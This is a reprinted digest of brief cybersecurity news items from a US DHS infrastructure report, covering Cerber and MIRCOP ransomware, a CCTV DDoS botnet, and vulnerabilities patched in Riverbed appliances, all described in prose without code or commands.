June 28, Softpedia – (International) Microsoft Office 365 corporate users hit by Cerber ransomware attack. Avanan researchers reported that about 57 percent of all companies using Microsoft Office 365 received at least 1 copy of the Cerber ransomware in their inboxes in a June 22 attack that lasted 5 hours before Microsoft blocked the malicious file attachments. Source
June 27, SecurityWeek – (International) MIRCOP ransomware claims to be victim, demands payback. Trend Micro researchers reported that the MIRCOP ransomware abuses Microsoft PowerShell to download and execute the malicious payload, and sends the user a ransom note claiming that the victim stole 48.48 Bitcoins, suggesting that the victim knows how to return the money. MIRCOP prepends files with the string “Lock” and can steal credentials from various applications including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype. Source
June 28, Help Net Security – (International) 25,000-strong CCTV botnet used for crippling DDoS attacks. Sucuri researchers discovered that a closed circuit television (CCTV) botnet comprised of 25,000 cameras worldwide was carrying out distributed denial-of-service (DDoS) attacks against a jewelry store Web site and found that the compromised cameras were able to emulate normal behavior of popular browsers in order to make the botnet more difficult to identify and block. Researchers reported that the attackers could have hacked the devices via a recently disclosed remote code execution (RCE) vulnerability in CCTV-Digital Video Recorders (DVRs). Source
June 28, The Register – (International) Riverbed’s NetProfiler, NetExpress virty appliances patched. Riverbed released an update for two of its virtual security appliances, the SteelCentral NetProfiler and NetExpress, patching a Structured Query Language (SQL) injection, command injection, privilege escalation, local file intrusion, cross-site scripting (XSS), account hijacks, and hard-coded credential vulnerabilities, which could be linked together to obtain unauthenticated remote code execution (RCE) as the root user. Source
Above Reprinted from the USDHS Daily Open Source Infrastructure Report